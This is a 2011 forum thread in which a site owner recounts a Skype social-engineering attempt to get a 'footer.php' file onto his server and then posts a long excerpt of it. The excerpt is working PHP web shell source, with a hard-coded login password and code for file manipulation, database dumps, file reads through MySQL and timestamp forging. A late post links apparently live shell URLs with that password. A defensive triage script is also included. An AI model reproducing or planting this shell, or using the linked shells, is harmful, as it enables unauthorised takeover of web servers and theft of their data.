PLA Forums

Other Stuff That Has Little To Do With PLA => General Discussions => Topic started by: rbcp on June 10, 2011, 02:35:42 PM

Title: Our New Administrator
Post by: rbcp on June 10, 2011, 02:35:42 PM
Some guy added me on Skype today and began trying to call me for an hour straight.  After telling him I couldn't pick up, I'm not sure what happened, but I'm pretty sure our forums have a new admin.  Welcome to the team, Bilgiislen!

Brad Carter 2:34 PM sorry, i can't pick up right now

BİLGİİSLEM KEMAL 2:35 PM facebook fan pages are the web site have liked it very much would like to give you support

Brad Carter 2:35 PM thanks

BİLGİİSLEM KEMAL 2:36 PM We know web design your page I want to be my manager
I want to be my page, the administrator have knowledge of web design

Brad Carter 2:37 PM i don't understand anything you're saying

BİLGİİSLEM KEMAL 2:38 PM http://www.phonelosers.com/index.php
you web site ?

Brad Carter 2:39 PM yes

BİLGİİSLEM KEMAL 2:39 PM I want to be the website administrator

Brad Carter 2:40 PM why?

BİLGİİSLEM KEMAL 2:40 PM I am interested in my page to bring the fans on Facebook members multiplies

Brad Carter 2:42 PM Thank you, but we've already got people running that web site

BİLGİİSLEM KEMAL 2:43 PM I want to be with you

Brad Carter 2:43 PM I don't swing that way, baby

BİLGİİSLEM KEMAL 2:43 PM Would you make something for me well
In a tiny thing
???

Brad Carter 2:48 PM  I don't know what you're asking

BİLGİİSLEM KEMAL 2:49 PM Do you have a server that installs a small php file

Brad Carter 2:50 PM Why yes I do!

BİLGİİSLEM KEMAL is sending you a file 2:50 PM footer.php

BİLGİİSLEM KEMAL 2:50 PM  this file
can change the name of the
Once installed, you give the url address

Brad Carter 2:52 PM This seems like the worst idea ever.

BİLGİİSLEM KEMAL 2:52 PM No, but you certainly could swear
I just want you to do so after 1 hour my server does not delete

Brad Carter 2:53 PM Monkeys kidnapped my grandparents and I have to wait at the pay phone at 5:00

BİLGİİSLEM KEMAL 2:54 PM
Would you please be so kind you can throw and then delete the file again, I get it now
and I'll do you as a gift to send to facebook fan page

Brad Carter 2:55 PM Watch me eat 450 hardboiled eggs.

BİLGİİSLEM KEMAL 2:55 PM I want something smallish

Brad Carter 2:55 PM Are you for panda rape?

BİLGİİSLEM KEMAL 2:56 PM No rape trial just do not care that my server does not

Brad Carter 2:56 PM What do you say we make apple juice and fax it to each other?

BİLGİİSLEM KEMAL 2:57 PM ???

Brad Carter 2:57 PM  I have a sheep doing roofing over at my house.  Why don't you drop in?  We'll put on Zeppelin and eat cheddar cheese.

BİLGİİSLEM KEMAL 2:57 PM of mine you're kidding

Brad Carter 2:57 PM  Jesus is a raisin.

BİLGİİSLEM KEMAL 2:59 PM Could you upload the file?

Brad Carter 2:59 PM  I already did

BİLGİİSLEM KEMAL 3:00 PM  What is the address

Brad Carter 3:00 PM  1313 Mockingbird Lane, Los Angeles, CA 90210

BİLGİİSLEM KEMAL 3:00 PM  no
file address

Brad Carter 3:01 PM What should I file the address under?
I have a manilla folder.
And a label maker.

BİLGİİSLEM KEMAL 3:02 PM  I understand
http://www.phonelosers.com/.... ?
I gave the file which is installed in the folder

Brad Carter 3:02 PM  I am copying the PHP code by hand on college ruled paper
I'm almost finished with it

BİLGİİSLEM KEMAL 3:03 PM Did you install the file server

Brad Carter 3:06 PM  yes
what files are we going to server?
i will have a joyous time serving files

BİLGİİSLEM KEMAL 3:07 PM You can make it if we were loaded url

Brad Carter 3:07 PM  I am loading the URL as we speak
My pen is out of ink

BİLGİİSLEM KEMAL 3:07 PM  No kidding
You can make the file path
Title: Re: Our New Administrator
Post by: DBK on June 10, 2011, 02:44:08 PM
Be careful, he might be trying to trick you.
Title: Re: Our New Administrator
Post by: nyphonejacks on June 10, 2011, 03:12:28 PM
I am not too sure about panda rape, Sexual Harassment Panda says
"The first party of the first panda may sue the second-party panda unless that panda was said panda aforementioned panda"

http://www.youtube.com/watch?v=bN1xLgSlGpI
Title: Re: Our New Administrator
Post by: markov on June 10, 2011, 04:26:07 PM
wow... that's a pretty amazing conversation
Title: Re: Our New Administrator
Post by: Godot on June 10, 2011, 07:50:27 PM
I want to see that PHP file he sent you...
Title: Re: Our New Administrator
Post by: rbcp on June 10, 2011, 08:17:41 PM
Quote
I want to see that PHP file he sent you...

Here's part of it.  It was 2,000 lines of code and it's too big to post here. 
This is about 1/4th of it though.  I just skimmed over it so I don't really
know what it does, but there's lots of file writing and directory creating.


Code:
/*****************************************************************************

===================== ÇëÎóÓÃÓÚ·Ç·¨ÓÃ;£¬Ôì³ÉÒ»Çкó¹ûÓë±¾ÈËÎŞ¹Ø¡£====================

·¢²¼´Ë°æ±¾ÊÇΪÁ˼ÍÄȫÌìÊ¹Ôø¾­µÄ»Ô»Í¡£

¸ĞĞ»ÄãÃÇÓëÎÒһͬ×ß¹ı£ºSniper\Super¡¤Hei\kEvin1986\saiy\wofeiwo¡£

¸ĞĞ»ËùÓеÄÅóÓÑÃÇ¡¢ĞÖµÜÃÇ¡£¶àĞ»ÄãÃǵĹØĞĺÍÖ§³Ö£¡

Ñ¡ÔñÔÚ1ÔÂ7ÈÕ·¢²¼ÊÇΪÁ˼ÍÄîÎÒÀÏÆÅµÄÉúÈÕ£¬Ô¤×£ÎÒÔÚ±¾ÃüÄêÀï¡£ÏÌÓã·­Éí£¡

====================== ×îºóԤף°²È«ÌìʹµÄÿһλÅóÓÑ·É»ÆÌÚ´ï =======================

Codz by kodk3r(Muro)

Make in China

Web: http://www.TeknoWBH.Com

*****************************************************************************/

error_reporting(7);
@set_magic_quotes_runtime(0);
ob_start();
$mtime = explode(' ', microtime());
$starttime = $mtime[1] + $mtime[0];
define('SA_ROOT', str_replace('\\', '/', dirname(__FILE__)).'/');
//define('IS_WIN', strstr(PHP_OS, 'WIN') ? 1 : 0 );
define('IS_WIN', DIRECTORY_SEPARATOR == '\\');
define('IS_COM', class_exists('COM') ? 1 : 0 );
define('IS_GPC', get_magic_quotes_gpc());
$dis_func = get_cfg_var('disable_functions');
define('IS_PHPINFO', (!eregi("phpinfo",$dis_func)) ? 1 : 0 );
@set_time_limit(0);

foreach(array('_GET','_POST') as $_request) {
foreach($$_request as $_key => $_value) {
if ($_key{0} != '_') {
if (IS_GPC) {
$_value = s_array($_value);
}
$$_key = $_value;
}
}
}

/*===================== ³ÌĞòÅäÖà =====================*/
$admin = array();
// ÊÇ·ñĞèÒªÃÜÂëÑéÖ¤, true ΪĞèÒªÑéÖ¤, false Ϊֱ½Ó½øÈë.ÏÂÃæÑ¡ÏîÔòÎŞĞ§
$admin['check'] = true;
// Èç¹ûĞèÒªÃÜÂëÑéÖ¤,ÇëĞŞ¸ÄµÇ½ÃÜÂë
$admin['pass']  = 'muro1';

//ÈçÄú¶Ô cookie ×÷Ó÷¶Î§ÓĞÌØÊâÒªÇó, »òµÇ¼²»Õı³£, ÇëĞŞ¸ÄÏÂÃæ±äÁ¿, ·ñÔòÇë±£³ÖĬÈÏ
// cookie ǰ׺
$admin['cookiepre'] = '';
// cookie ×÷ÓÃÓò
$admin['cookiedomain'] = '';
// cookie ×÷Ó÷¾¶
$admin['cookiepath'] = '/';
// cookie ÓĞЧÆÚ
$admin['cookielife'] = 86400;
/*===================== ÅäÖýáÊø =====================*/

if ($charset == 'utf8') {
header("content-Type: text/html; charset=utf-8");
} elseif ($charset == 'big5') {
header("content-Type: text/html; charset=big5");
} elseif ($charset == 'gbk') {
header("content-Type: text/html; charset=gbk");
} elseif ($charset == 'latin1') {
header("content-Type: text/html; charset=iso-8859-2");
}

$self = $_SERVER['PHP_SELF'] ? $_SERVER['PHP_SELF'] : $_SERVER['SCRIPT_NAME'];
$timestamp = time();

/*===================== Éí·İÑéÖ¤ =====================*/
if ($action == "logout") {
scookie('phpspypass', '', -86400 * 365);
p('<meta http-equiv="refresh" content="1;URL='.$self.'">');
p('<a style="font:12px Verdana" href="'.$self.'">Success</a>');
exit;
}
if($admin['check']) {
if ($doing == 'login') {
if ($admin['pass'] == $password) {
scookie('phpspypass', $password);
p('<meta http-equiv="refresh" content="1;URL='.$self.'">');
p('<a style="font:12px Verdana" href="'.$self.'">Success</a>');
exit;
}
}
if ($_COOKIE['phpspypass']) {
if ($_COOKIE['phpspypass'] != $admin['pass']) {
loginpage();
}
} else {
loginpage();
}
}
/*===================== ÑéÖ¤½áÊø =====================*/

$errmsg = '';

// ²é¿´PHPINFO
if ($action == 'phpinfo') {
if (IS_PHPINFO) {
phpinfo();
} else {
$errmsg = 'phpinfo() function has non-permissible';
}
}

// ÏÂÔØÎļş
if ($doing == 'downfile' && $thefile) {
if (!@file_exists($thefile)) {
$errmsg = 'The file you want Downloadable was nonexistent';
} else {
$fileinfo = pathinfo($thefile);
header('Content-type: application/x-'.$fileinfo['extension']);
header('Content-Disposition: attachment; filename='.$fileinfo['basename']);
header('Content-Length: '.filesize($thefile));
@readfile($thefile);
exit;
}
}

// Ö±½ÓÏÂÔØ±¸·İÊı¾İ¿â
if ($doing == 'backupmysql' && !$saveasfile) {
dbconn($dbhost, $dbuser, $dbpass, $dbname, $charset, $dbport);
$table = array_flip($table);
$result = q("SHOW tables");
if (!$result) p('<h2>'.mysql_error().'</h2>');
$filename = basename($_SERVER['HTTP_HOST'].'_MySQL.sql');
header('Content-type: application/unknown');
header('Content-Disposition: attachment; filename='.$filename);
$mysqldata = '';
while ($currow = mysql_fetch_array($result)) {
if (isset($table[$currow[0]])) {
$mysqldata .= sqldumptable($currow[0]);
}
}
mysql_close();
exit;
}

// ͨ¹ıMYSQLÏÂÔØÎļş
if($doing=='mysqldown'){
if (!$dbname) {
$errmsg = 'Please input dbname';
} else {
dbconn($dbhost, $dbuser, $dbpass, $dbname, $charset, $dbport);
if (!file_exists($mysqldlfile)) {
$errmsg = 'The file you want Downloadable was nonexistent';
} else {
$result = q("select load_file('$mysqldlfile');");
if(!$result){
q("DROP TABLE IF EXISTS tmp_kodk3rMuro;");
q("CREATE TABLE tmp_kodk3rMuro (content LONGBLOB NOT NULL);");
//ÓÃʱ¼ä´ÁÀ´±íʾ½Ø¶Ï,±ÜÃâ³öÏÖ¶ÁÈ¡×ÔÉí»ò°üº¬__kodk3rMuro_1111111111_eof__µÄÎļşÊ±²»ÍêÕûµÄÇé¿ö
q("LOAD DATA LOCAL INFILE '".addslashes($mysqldlfile)."' INTO TABLE tmp_kodk3rMuro FIELDS TERMINATED BY '__kodk3rMuro_{$timestamp}_eof__' ESCAPED BY '' LINES TERMINATED BY '__kodk3rMuro_{$timestamp}_eof__';");
$result = q("select content from tmp_kodk3rMuro");
q("DROP TABLE tmp_kodk3rMuro");
}
$row = @mysql_fetch_array($result);
if (!$row) {
$errmsg = 'Load file failed '.mysql_error();
} else {
$fileinfo = pathinfo($mysqldlfile);
header('Content-type: application/x-'.$fileinfo['extension']);
header('Content-Disposition: attachment; filename='.$fileinfo['basename']);
header("Accept-Length: ".strlen($row[0]));
echo $row[0];
exit;
}
}
}
}

?>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gbk">
<title><?php echo str_replace('.','','#K.o.d.k.3.r. P.H.P. W.e.b. S.h.e.l.l. J.u.st. f.o.r. f.u.n  B.y #.C.y.b.e.r.H.a.c.k.e.r.s:) ');?></title>
<style type="text/css">
body,td{font: 12px Arial,Tahoma;line-height: 16px;}
.input{font:12px Arial,Tahoma;background:#fff;border: 1px solid #666;padding:2px;height:22px;}
.area{font:12px 'Courier New', Monospace;background:#fff;border: 1px solid #666;padding:2px;}
.bt {border-color:#b0b0b0;background:#33CCFF;color:#ffffff;font:12px Arial,Tahoma;height:22px;}
a {color: #00f;text-decoration:underline;}
a:hover{color: #f00;text-decoration:none;}
.alt1 td{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#f1f1f1;padding:5px 10px 5px 5px;}
.alt2 td{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#f9f9f9;padding:5px 10px 5px 5px;}
.focus td{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#ffffaa;padding:5px 10px 5px 5px;}
.head td{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#e9e9e9;padding:5px 10px 5px 5px;font-weight:bold;}
.head td span{font-weight:normal;}
form{margin:0;padding:0;}
h2{margin:0;padding:0;height:24px;line-height:24px;font-size:14px;color:#006666;}
ul.info li{margin:0;color:#444;line-height:24px;height:24px;}
u{text-decoration: none;color:#777;float:left;display:block;width:150px;margin-right:10px;}
</style>
<script type="text/javascript">
function CheckAll(form) {
for(var i=0;i<form.elements.length;i++) {
var e = form.elements[i];
if (e.name != 'chkall')
e.checked = form.chkall.checked;
    }
}
function $(id) {
return document.getElementById(id);
}
function goaction(act){
$('goaction').action.value=act;
$('goaction').submit();
}
</script>
</head>
<body style="margin:0;table-layout:fixed; word-break:break-all">
<table width="100%" border="0" cellpadding="0" cellspacing="0">
<tr class="head">
<td><span style="float:right;"><a href="http://www.TeknoWbh.Com" target="_blank"><?php echo str_replace('.','','#Root@Suikast.&#304;N');?> Version: 2010</a></span><?php echo $_SERVER['HTTP_HOST'];?> (<?php echo gethostbyname($_SERVER['SERVER_NAME']);?>)</td>
</tr>
<tr class="alt1">
<td><span style="float:right;">Guvenli Mod:<?php echo getcfg('safe_mode');?></span>
<a href="javascript:goaction('logout');">CıkıS</a> |
<a href="javascript:goaction('file');">Dosya Yoneticisi</a> |
<a href="javascript:goaction('sqladmin');">MySQL Yoneticisi</a> |
<a href="javascript:goaction('sqlfile');">MySQL Yukle &amp; INDIR</a> |
<a href="javascript:goaction('shell');">Yurutme Komutu</a> |
<a href="javascript:goaction('phpenv');">PHP Degisken</a> |
<a href="javascript:goaction('eval');">Eval PHP Kod</a>
<?php if (!IS_WIN) {?> | <a href="javascript:goaction('backconnect');">Geri Baglayin!</a><?php }?>
</td>
</tr>
</table>
<table width="100%" border="0" cellpadding="15" cellspacing="0"><tr><td>
<?php

formhead
(array('name'=>'goaction'));
makehide('action');
formfoot();

$errmsg && m($errmsg);

// »ñÈ¡µ±Ç°Â·¾¶
!$dir && $dir '.';
$nowpath getPath(SA_ROOT$dir);
if (
substr($dir, -1) != '/') {
$dir $dir.'/';
}
$uedir ue($dir);

if (!
$action || $action == 'file') {

// Å&#286;¶Ï¶Á&#286;´Çé¿ö
$dir_writeable = @is_writable($nowpath) ? 'Writable' 'Non-writable';

// É¾³&#305;Ŀ¼
if ($doing == 'deldir' && $thefile) {
if (!file_exists($thefile)) {
m($thefile.' directory does not exist');
} else {
m('Directory delete '.(deltree($thefile) ? basename($thefile).' success' 'failed'));
}
}

// ´´½¨Ä¿Â¼
elseif ($newdirname) {
$mkdirs $nowpath.$newdirname;
if (file_exists($mkdirs)) {
m('Directory has already existed');
} else {
m('Directory created '.(@mkdir($mkdirs,0777) ? 'success' 'failed'));
@chmod($mkdirs,0777);
}
}

// ÉÏ´«Îļ&#351;
elseif ($doupfile) {
m('File upload '.(@copy($_FILES['uploadfile']['tmp_name'],$uploaddir.'/'.$_FILES['uploadfile']['name']) ? 'success' 'failed'));
}

// ±à¼­Îļ&#351;
elseif ($editfilename && $filecontent) {
$fp = @fopen($editfilename,'w');
m('Save file '.(@fwrite($fp,$filecontent) ? 'success' 'failed'));
@fclose($fp);
}

// ±à¼­Îļ&#351;Êô&#286;Ô
elseif ($pfile && $newperm) {
if (!file_exists($pfile)) {
m('The original file does not exist');
} else {
$newperm base_convert($newperm,8,10);
m('Modify file attributes '.(@chmod($pfile,$newperm) ? 'success' 'failed'));
}
}

// ¸ÄÃû
elseif ($oldname && $newfilename) {
$nname $nowpath.$newfilename;
if (file_exists($nname) || !file_exists($oldname)) {
m($nname.' has already existed or original file does not exist');
} else {
m(basename($oldname).' renamed '.basename($nname).(@rename($oldname,$nname) ? ' success' 'failed'));
}
}

// ¸´ÖÆÎļ&#351;
elseif ($sname && $tofile) {
if (file_exists($tofile) || !file_exists($sname)) {
m('The goal file has already existed or original file does not exist');
} else {
m(basename($tofile).' copied '.(@copy($sname,$tofile) ? basename($tofile).' success' 'failed'));
}
}

// ¿Ë¡ʱ¼ä
elseif ($curfile && $tarfile) {
if (!@file_exists($curfile) || !@file_exists($tarfile)) {
m('The goal file has already existed or original file does not exist');
} else {
$time = @filemtime($tarfile);
m('Modify file the last modified '.(@touch($curfile,$time,$time) ? 'success' 'failed'));
}
}

// ×Ô¶¨Òåʱ¼ä
elseif ($curfile && $year && $month && $day && $hour && $minute && $second) {
if (!@file_exists($curfile)) {
m(basename($curfile).' does not exist');
} else {
$time strtotime("$year-$month-$day $hour:$minute:$second");
m('Modify file the last modified '.(@touch($curfile,$time,$time) ? 'success' 'failed'));
}
}

// ´ò°üÏÂÔØ
elseif($doing == 'downrar') {
if ($dl) {
$dfiles='';
foreach ($dl as $filepath => $value) {
$dfiles.=$filepath.',';
}
$dfiles=substr($dfiles,0,strlen($dfiles)-1);
$dl=explode(',',$dfiles);
$zip=new PHPZip($dl);
$code=$zip->out;
header('Content-type: application/octet-stream');
header('Accept-Ranges: bytes');
header('Accept-Length: '.strlen($code));
header('Content-Disposition: attachment;filename='.$_SERVER['HTTP_HOST'].'_Files.tar.gz');
echo $code;
exit;
} else {
m('Please select file(s)');
}
}

// ÅúÁ¿É¾³&#305;Îļ&#351;
elseif($doing == 'delfiles') {
if ($dl) {
$dfiles='';
$succ $fail 0;
foreach ($dl as $filepath => $value) {
if (@unlink($filepath)) {
$succ++;
} else {
$fail++;
}
}
m('Deleted file have finished£¬choose '.count($dl).' success '.$succ.' fail '.$fail);
} else {
m('Please select file(s)');
}
}

//²Ù×÷Íê±Ï
formhead(array('name'=>'createdir'));
makehide('newdirname');
makehide('dir',$nowpath);
formfoot();
formhead(array('name'=>'fileperm'));
makehide('newperm');
makehide('pfile');
makehide('dir',$nowpath);
formfoot();
formhead(array('name'=>'copyfile'));
makehide('sname');
makehide('tofile');
makehide('dir',$nowpath);
formfoot();
formhead(array('name'=>'rename'));
makehide('oldname');
makehide('newfilename');
makehide('dir',$nowpath);
formfoot();
formhead(array('name'=>'fileopform'));
makehide('action');
makehide('opfile');
makehide('dir');
formfoot();

$free = @disk_free_space($nowpath);
!$free && $free 0;
$all = @disk_total_space($nowpath);
!$all && $all 0;
$used $all-$free;
$used_percent = @round(100/($all/$free),2);
p('<h2>Dosya Yoneticisi - Suan disk bos '.sizecount($free).' of '.sizecount($all).' ('.$used_percent.'%)</h2>');

?>

<table width="100%" border="0" cellpadding="0" cellspacing="0" style="margin:10px 0;">
  <form action="" method="post" id="godir" name="godir">
  <tr>
    <td nowrap>Gecerlı Dizin (<?php echo $dir_writeable;?>, <?php echo getChmod($nowpath);?>)</td>
<td width="100%"><input name="view_writable" value="0" type="hidden" /><input class="input" name="dir" value="<?php echo $nowpath;?>" type="text" style="width:100%;margin:0 8px;"></td>
    <td nowrap><input class="bt" value="GO" type="submit"></td>
  </tr>
  </form>
</table>

Title: Re: Our New Administrator
Post by: murd0c on June 11, 2011, 07:55:56 AM
WTF, why didn't you install the file like he asked? Jerk!
Title: Re: Our New Administrator
Post by: ApprenticePhreak on June 11, 2011, 08:52:00 AM
Ask him if he charges a monthly fee for admining. I need an admin to solve my issues when my computer pops up with a blue screen, it always tells me to contact my computer's administrator and I'm not sure at all who that is!
Title: Re: Our New Administrator
Post by: BxK on June 11, 2011, 11:36:28 PM
You should upload the entire file.
Title: Re: Our New Administrator
Post by: rbcp on June 12, 2011, 03:38:05 PM
Quote
You should upload the entire file.

YOU'RE ONE OF THEM!
Title: Re: Our New Administrator
Post by: Acidpez on June 12, 2011, 09:07:49 PM
Make a fake site like phonewinnerz.org on a cheap host like hostbig.com  and put the PHP file on it and see what happens.
Title: Re: Our New Administrator
Post by: Godot on June 12, 2011, 10:20:08 PM
The PHP is just a script to give him full access to your website and databases. Looks like something a hacker would drop onto a site.
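
Added example, not part of the original post or of the file rbcp received: a small static triage check that flags the traits visible in the excerpt above (request parameters imported as globals, a hard-coded login password, file reads through MySQL, timestamp cloning, error-suppressed file operations). The pattern names, the threshold and both sample strings are assumptions made for this illustration; the first sample reuses lines from the posted excerpt, lightly abridged.

```python
import re

# Heuristic patterns chosen for this example; they are not vendor signatures.
INDICATORS = {
    "request_vars_imported_as_globals": re.compile(r"\$\$\w+\s*=\s*\$\w+"),
    "time_limit_removed": re.compile(r"set_time_limit\s*\(\s*0\s*\)"),
    "probes_disable_functions": re.compile(
        r"get_cfg_var\s*\(\s*['\"]disable_functions['\"]"),
    "sql_file_read": re.compile(
        r"load_file\s*\(|LOAD\s+DATA\s+LOCAL\s+INFILE", re.I),
    # mtime read from one file and applied to another a few lines later
    "timestamp_cloning": re.compile(
        r"filemtime\s*\([^)]*\)[\s\S]{0,200}?touch\s*\("),
    "hardcoded_login_password": re.compile(
        r"\[\s*['\"]pass(?:word)?['\"]\s*\]\s*=\s*['\"][^'\"]+['\"]"),
}

# File operations called with PHP's @ error-suppression operator.
SUPPRESSED_FS = re.compile(
    r"@(?:copy|unlink|chmod|mkdir|rename|fopen|fwrite|touch|readfile)\s*\(")


def triage(source, threshold=3):
    """Return matched indicator names and whether the file needs review."""
    hits = sorted(name for name, rx in INDICATORS.items() if rx.search(source))
    suppressed = len(SUPPRESSED_FS.findall(source))
    if suppressed >= 3:
        hits.append("error_suppressed_file_ops")
    return {"hits": hits,
            "suppressed_fs_calls": suppressed,
            "suspicious": len(hits) >= threshold}


# Constructed sample 1: lines taken from the excerpt posted in this thread.
POSTED_FRAGMENT = r'''
@set_time_limit(0);
$dis_func = get_cfg_var('disable_functions');
foreach($$_request as $_key => $_value) { $$_key = $_value; }
$admin['pass']  = 'muro1';
$result = q("select load_file('$mysqldlfile');");
$time = @filemtime($tarfile);
@touch($curfile,$time,$time);
@copy($sname,$tofile);
@chmod($mkdirs,0777);
'''

# Constructed sample 2: what a page footer template typically contains.
BENIGN_FOOTER = r'''
<?php $year = date('Y'); ?>
<div id="footer">&copy; <?php echo htmlspecialchars($year); ?> Example Site</div>
'''

if __name__ == "__main__":
    for label, text in (("posted fragment", POSTED_FRAGMENT),
                        ("benign footer", BENIGN_FOOTER)):
        result = triage(text)
        print(label, "->", "REVIEW" if result["suspicious"] else "ok",
              result["hits"])
```

A file named footer.php that trips several of these at once does not look like a footer template; the check is a first-pass filter for uploads and web roots, not a replacement for reading the file.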

Title: Re: Our New Administrator
Post by: markov on June 13, 2011, 05:24:47 AM
Quote
The PHP is just a script to give him full access to your website and databases. Looks like something a hacker would drop onto a site.


LIES!!! You'll be hearing from BİLGİİSLEM KEMAL's lawyer regarding your slanderous post!!
Title: Re: Our New Administrator
Post by: HeavyRittles on June 13, 2011, 05:02:08 PM
You'd think having working knowledge of the mark's language would be the first step in SE... *rainbowsmiley*
Title: Re: Our New Administrator
Post by: ApprenticePhreak on June 14, 2011, 05:53:46 AM
Quote
You'd think having working knowledge of the mark's language would be the first step in SE... *rainbowsmiley*

Speaking the same language as the mark tends to help out quite a bit as well. If you can't convey your message clearly of what you want, you won't get it.  :nonsense: :nonsense: :nonsense: :nonsense: :nonsense: :nonsense: :nonsense: :nonsense: :nonsense: :nonsense: :nonsense: :nonsense: :nonsense: :nonsense: :nonsense: :nonsense: :nonsense: :nonsense: :nonsense: :nonsense: :nonsense: :nonsense: :nonsense: :nonsense: :nonsense: :nonsense: :nonsense: :nonsense: :nonsense: :nonsense: :nonsense: :nonsense: :nonsense: :nonsense: :nonsense: :nonsense: :nonsense: :nonsense:
Title: Re: Our New Administrator
Post by: BxK on June 15, 2011, 11:52:36 AM
He couldn't use it unless he knew the URL to the file, and SMF doesn't allow direct file linking like that, hence the sequence of numbers on the download files. It doesn't allow code execution that way either.  It was used to hack SMF a while back. So yes, it's safe to upload it as an attachment.  What a boring day...:p
Title: Re: Our New Administrator
Post by: SpaceBison on June 28, 2011, 12:37:52 AM
He seemed like a nice guy. You really ought to be more trusting of people, rbcp. Shame on you.  :nonsense:
Title: Re: Our New Administrator
Post by: kuraz on June 28, 2011, 09:09:28 AM
so my evil plan didn't work?
Title: Re: Our New Administrator
Post by: Altalp on July 13, 2011, 11:17:44 AM
(http://www.snorgtees.com/media/catalog/product/h/u/hugz_fullpic_1.jpg)
Title: Re: Our New Administrator
Post by: adivan on August 06, 2011, 08:44:54 AM
That gibberish code is insane! Any update on this one yet?
Title: Re: Our New Administrator
Post by: recon on August 06, 2011, 08:51:42 AM
Just a PHP shell. Most of your shared hosting is going to take away any possibility of fun since they generally limit the system()/exec() commands. But it was nice of him to share his password.
Title: Re: Our New Administrator
Post by: markov on August 06, 2011, 09:05:34 AM
Quote
But it was nice of him to share his password.


Haha... nice
Title: Re: Our New Administrator
Post by: Legion303 on August 27, 2011, 03:03:49 AM
Quote
Make in China

RBCP, shame on you for not trusting anonymous Chinese coders. They have only your best interests at heart.

In fact, it looks like he set up a test site to show you he's perfectly legit: http://www.nbppl.in/404/nullshell.php

And www.nbppl.in/404/kodk3r.php with the password he thoughtfully provided in the script.